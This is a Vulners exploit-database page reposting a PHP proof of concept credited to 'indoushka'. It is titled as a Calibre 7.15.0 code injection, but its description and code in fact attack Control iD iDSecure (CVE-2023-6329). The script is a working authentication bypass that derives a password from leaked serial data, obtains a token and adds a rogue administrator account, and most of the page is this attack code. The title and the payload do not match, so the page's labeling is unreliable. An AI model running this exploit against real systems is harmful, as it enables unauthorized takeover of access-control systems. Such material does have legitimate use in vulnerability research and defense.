Vulners
Lucene search
Calibre 7.15.0 Code Injection
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | Calibre 7.15.0 Python Code Injection Exploit | 8 Aug 202400:00 | – | zdt |
 | Exploit for CVE-2024-6782 | 15 Sep 202418:45 | – | githubexploit |
| Exploit for CVE-2024-6782 | 15 Sep 202418:45 | – | githubexploit |
| Exploit for CVE-2024-6782 | 9 Aug 202406:25 | – | githubexploit |
| Exploit for CVE-2024-6782 | 6 Aug 202415:31 | – | githubexploit |
| Exploit for Improper Authentication in Controlid Idsecure | 11 Mar 202615:04 | – | githubexploit |
 | CVE-2023-6329 | 17 Dec 202309:37 | – | circl |
| CVE-2024-6782 | 6 Aug 202407:28 | – | circl |
 | Control iD iDSecure Security Breach | 27 Nov 202300:00 | – | cnnvd |
 | Calibre Access Control Error Vulnerability | 9 Aug 202400:00 | – | cnvd |
10
=============================================================================================================================================
| # Title : Calibre 7.15.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.calibre-ebook.com/7.15.0/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: It used to exploit a vulnerability in the Control iD iDSecure access control system that allows unauthenticated remote attackers to access the system administration interface and add a new administrative user.
Main uses of the code: Version check: The code first checks whether the current version of the system is affected by the specified vulnerability (CVE-2023-6329).
If the version is affected by the vulnerability (less than or equal to 4.7.43.0), the exploit can be executed.
Sensitive data extraction:Extracts data such as serial and passwordRandom from the target server using a GET request to a specific API.
This data is used to generate a custom password (passwordCustom) which is part of the authentication process.
( https://packetstorm.news/files/id/180007/ CVE-2024-6782)
[+] save code as poc.php.
[+] Set Target : line 162
[+] USage : php poc.php
[+] PayLoad :
<?php
class ControlIDiDSecureAuthBypass {
private $target_uri;
private $new_user;
private $new_password;
public function __construct($target_uri, $new_user = null, $new_password = null) {
$this->target_uri = $target_uri;
$this->new_user = $new_user ?? bin2hex(random_bytes(4)); // Default to random alphanumeric user
$this->new_password = $new_password ?? bin2hex(random_bytes(6)); // Default to random alphanumeric password
}
// Check if vulnerable version is running
public function check() {
$url = $this->target_uri . '/api/util/configUI';
$response = $this->send_request($url, 'GET');
if ($response['code'] != 401) {
return 'Unknown';
}
$data = json_decode($response['body'], true);
$version = $data['Version'] ?? null;
if (is_null($version)) {
return 'Unknown';
}
echo "Got version: $version\n";
if (version_compare($version, '4.7.43.0', '<=')) {
return 'Appears';
}
return 'Safe';
}
// Exploit to add a new user
public function run() {
// Step 1: Get serial and passwordRandom
$url = $this->target_uri . '/api/login/unlockGetData';
$response = $this->send_request($url, 'GET');
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
$password_random = $json['passwordRandom'] ?? null;
$serial = $json['serial'] ?? null;
if (!$password_random || !$serial) {
throw new Exception('Unable to retrieve passwordRandom and serial');
}
echo "Retrieved passwordRandom: $password_random\n";
echo "Retrieved serial: $serial\n";
// Step 2: Create passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = base_convert($short_hash, 16, 10);
echo "Created passwordCustom: $password_custom\n";
// Step 3: Login with passwordCustom and passwordRandom to get JWT
$body = json_encode([
'passwordCustom' => $password_custom,
'passwordRandom' => $password_random
]);
$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
$access_token = $json['accessToken'] ?? null;
if (!$access_token) {
throw new Exception('Did not receive JWT');
}
echo "Retrieved JWT: $access_token\n";
// Step 4: Add a new administrative user
$body = json_encode([
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
]);
$url = $this->target_uri . '/api/operator/';
$response = $this->send_request($url, 'POST', $body, $access_token);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
if ($json['code'] !== 200 || $json['error'] !== 'OK') {
throw new Exception('Unexpected reply from server');
}
// Step 5: Confirm the new credentials work
$body = json_encode([
'username' => $this->new_user,
'password' => $this->new_password,
'passwordCustom' => null
]);
$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);
if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}
$json = json_decode($response['body'], true);
if (!isset($json['accessToken']) || !isset($json['unlock'])) {
throw new Exception('Received unexpected reply');
}
echo "New user '{$this->new_user}:{$this->new_password}' was successfully added.\n";
echo "Login at: " . $this->target_uri . "/#/login\n";
}
// Helper function to send HTTP requests
private function send_request($url, $method, $body = null, $token = null) {
$headers = [
'Content-Type: application/json'
];
if ($token) {
$headers[] = "Authorization: Bearer $token";
}
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($body) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response_body = curl_exec($ch);
$response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ['code' => $response_code, 'body' => $response_body];
}
}
// Example usage:
$target_uri = 'https://example.com';
$module = new ControlIDiDSecureAuthBypass($target_uri);
if ($module->check() === 'Appears') {
$module->run();
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2025 00:00Current
10High risk
Vulners AI Score10
CVSS 3.19.8
EPSS0.93835
SSVC